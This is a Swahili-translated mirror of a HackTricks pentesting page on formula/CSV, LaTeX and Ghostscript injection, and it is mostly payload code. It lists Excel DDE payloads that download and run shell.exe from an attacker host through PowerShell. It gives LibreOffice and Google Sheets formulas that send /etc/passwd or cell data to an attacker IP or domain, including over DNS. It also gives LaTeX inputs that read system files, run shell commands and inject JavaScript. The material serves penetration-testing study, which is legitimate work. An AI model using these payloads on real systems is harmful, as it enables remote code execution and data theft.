Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md

12 KiB
Raw Blame History

Uingizaji wa Fomula/CSV/Doc/LaTeX/GhostScript

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kikundi cha Usalama cha Try Hard

{% embed url="https://discord.gg/tryhardsecurity" %}

Uingizaji wa Fomula

Taarifa

Ikiwa kuingizwa kwako kunakuwa kinaonekana ndani ya faili za CSV (au faili yoyote ambayo labda itafunguliwa na Excel), labda unaweza kuweka fomula za Excel ambazo zita tekelezwa wakati mtumiaji anafungua faili au wakati mtumiaji anabonyeza kiungo ndani ya karatasi ya Excel.

{% hint style="danger" %} Leo hii Excel itatoa tahadhari (mara kadhaa) kwa mtumiaji wakati kitu kinapakuliwa kutoka nje ya Excel ili kumzuia kufanya kitendo cha uovu. Kwa hivyo, juhudi maalum za Uhandisi wa Kijamii lazima zitumike kwa mzigo wa mwisho. {% endhint %}

Orodha ya Maneno

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Kiungo

Mfano ufuatao ni muhimu sana kwa kuchukua maudhui kutoka kwenye karatasi ya mwisho ya Excel na kufanya maombi kwa maeneo yasiyostahili. Lakini inahitaji mtumiaji bonyeza kiungo (na kukubali onyo).

Mfano ufuatao ulichukuliwa kutoka https://payatu.com/csv-injection-basic-to-exploit

Fikiria uvunjaji wa usalama katika mfumo wa Usimamizi wa Rekodi za Wanafunzi unaochunguzwa kupitia shambulio la kuingiza CSV. Nia kuu ya muhusika ni kuhatarisha mfumo unaotumiwa na walimu kusimamia maelezo ya wanafunzi. Mbinu inahusisha muhusika kuingiza mzigo mbaya kwenye programu, hasa kwa kuingiza fomula zenye madhara kwenye maeneo yanayolenga maelezo ya wanafunzi. Shambulio linavyoendelea kama ifuatavyo:

  1. Kuingiza Mzigo Mbaya:
  • Muhusika anawasilisha fomu ya maelezo ya mwanafunzi lakini anajumuisha fomula inayotumiwa kawaida kwenye karatasi za kielektroniki (k.m., =HYPERLINK("<malicious_link>","Bonyeza hapa")).
  • Fomula hii imeundwa kujenga kiungo, lakini inaelekeza kwenye seva mbaya inayodhibitiwa na muhusika.
  1. Kuuza Data Iliyohatarishwa:
  • Walimu, bila kujua kuhusu tishio, hutumia utendaji wa programu kuuza data kwenye faili ya CSV.
  • Faili ya CSV, ikifunguliwa, bado ina mzigo mbaya. Mzigo huu unaonekana kama kiungo kinachoweza kubonyezwa kwenye karatasi ya kielektroniki.
  1. Kuzindua Shambulio:
  • Mwalimu anabonyeza kiungo, akiamini ni sehemu halali ya maelezo ya mwanafunzi.
  • Baada ya kubonyeza, data nyeti (ikiwezekana maelezo kutoka kwenye karatasi ya kielektroniki au kompyuta ya mwalimu) inatumwa kwenye seva ya muhusika.
  1. Kuingiza Data:
  • Seva ya muhusika inapokea na kuingiza data nyeti iliyotumwa kutoka kwenye kompyuta ya mwalimu.
  • Muhusika anaweza kutumia data hii kwa madhumuni mbaya mbalimbali, kuhatarisha zaidi faragha na usalama wa wanafunzi na taasisi.

RCE

Angalia chapisho la asili kwa maelezo zaidi.

Katika mipangilio maalum au toleo za zamani za Excel, kipengele kinachoitwa Dynamic Data Exchange (DDE) kinaweza kutumiwa kutekeleza amri za aina yoyote. Ili kutumia hili, mipangilio ifuatayo lazima iwezeshwe:

  • Nenda kwa Faili → Chaguo → Kituo cha Kuaminika → Mipangilio ya Kituo cha Kuaminika → Yaliyomo ya Nje, na wezesha Uzinduzi wa Seva ya Kubadilishana Data ya Kudumu.

Wakati karatasi ya kielektroniki yenye mzigo mbaya inapofunguliwa (na ikiwa mtumiaji anakubali onyo), mzigo huo unatekelezwa. Kwa mfano, kuzindua programu ya kuhesabu, mzigo ungekuwa:

`=cmd|' /C calc'!xxx`

Unaweza pia kutekeleza amri zaidi, kama vile kupakua na kutekeleza faili kutumia PowerShell:

=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Uingizaji wa Faili ya Ndani (LFI) katika LibreOffice Calc

LibreOffice Calc inaweza kutumika kusoma faili za ndani na kutoa data. Hapa kuna njia kadhaa:

  • Kusoma mstari wa kwanza kutoka kwa faili ya ndani /etc/passwd: ='file:///etc/passwd'#$passwd.A1
  • Kutoa data iliyosomwa kwa seva iliyoongozwa na mshambuliaji: =WEBSERVICE(CONCATENATE("http://<anwani ya IP ya mshambuliaji>:8080/",('file:///etc/passwd'#$passwd.A1)))
  • Kutoa zaidi ya mstari mmoja: =WEBSERVICE(CONCATENATE("http://<anwani ya IP ya mshambuliaji>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
  • Utoaji wa DNS (kutuma data iliyosomwa kama maswali ya DNS kwa seva ya DNS iliyoongozwa na mshambuliaji): =WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<kikoa cha mshambuliaji>"))

Google Sheets kwa Utoaji wa Data wa Nje ya Band (OOB)

Google Sheets inatoa kazi ambazo zinaweza kutumiwa kwa utoaji wa data wa OOB:

  • CONCATENATE: Inaunganisha vivuli pamoja - =CONCATENATE(A2:E2)
  • IMPORTXML: Inaingiza data kutoka aina za data zilizopangwa - =IMPORTXML(CONCAT("http://<anwani ya IP ya mshambuliaji:Bandari>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
  • IMPORTFEED: Inaingiza vyanzo vya RSS au ATOM - =IMPORTFEED(CONCAT("http://<anwani ya IP ya mshambuliaji:Bandari>//123.txt?v=", CONCATENATE(A2:E2)))
  • IMPORTHTML: Inaingiza data kutoka kwenye meza au orodha za HTML - =IMPORTHTML (CONCAT("http://<anwani ya IP ya mshambuliaji:Bandari>/123.txt?v=", CONCATENATE(A2:E2)),"meza",1)
  • IMPORTRANGE: Inaingiza safu ya seli kutoka kwenye karatasi nyingine ya hesabu - =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Kitambulisho cha Karatasi]", "karatasi1!A2:E2")
  • IMAGE: Inaweka picha kwenye seli - =IMAGE("https://<anwani ya IP ya mshambuliaji:Bandari>/picha/srpr/logo3w.png")

Uingizaji wa LaTeX

Kawaida seva ambazo utazipata kwenye mtandao zinatumia pdflatex kubadilisha msimbo wa LaTeX kuwa PDF.
Programu hii hutumia sifa 3 kuu kwa kutekeleza au kuzuia amri:

  • --no-shell-escape: Zima ujenzi wa \write18{amri}, hata kama imezimwa kwenye faili ya texmf.cnf.
  • --shell-restricted: Sawa na --shell-escape, lakini imepunguzwa kwa seti 'salama' ya amri zilizopangwa (**Kwenye Ubuntu 16.04 orodha iko katika /usr/share/texmf/web2c/texmf.cnf).
  • --shell-escape: Washa ujenzi wa \write18{amri}. Amri inaweza kuwa amri yoyote ya kabati. Ujenzi huu kawaida unazuiliwa kwa sababu za usalama.

Hata hivyo, kuna njia nyingine za kutekeleza amri, hivyo ili kuepuka RCE ni muhimu sana kutumia --shell-restricted.

Soma faili

Inaweza kuhitaji kurekebisha uingizaji na vifungio kama [ au $.

\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Soma faili lenye mstari mmoja

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Soma faili lenye mistari mingi

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file

Andika faili 

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Kutumia Amri

Kuingiza amri kutoka kwa stdin, tumia faili la muda kupata hiyo.

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Ikiwa unapata kosa lolote la LaTex, fikiria kutumia base64 kupata matokeo bila herufi mbaya

\immediate\write18{env | base64 > test.tex}
\input{text.tex}

\input|ls|base4
\input{|"/bin/hostname"}

Kuvuka Site Scripting

Kutoka @EdOverflow

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

Uingizaji wa Ghostscript

Angalia https://blog.redteam-pentesting.de/2023/ghostscript-overview/

Marejeo

Kikundi cha Usalama cha Try Hard

{% embed url="https://discord.gg/tryhardsecurity" %}

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: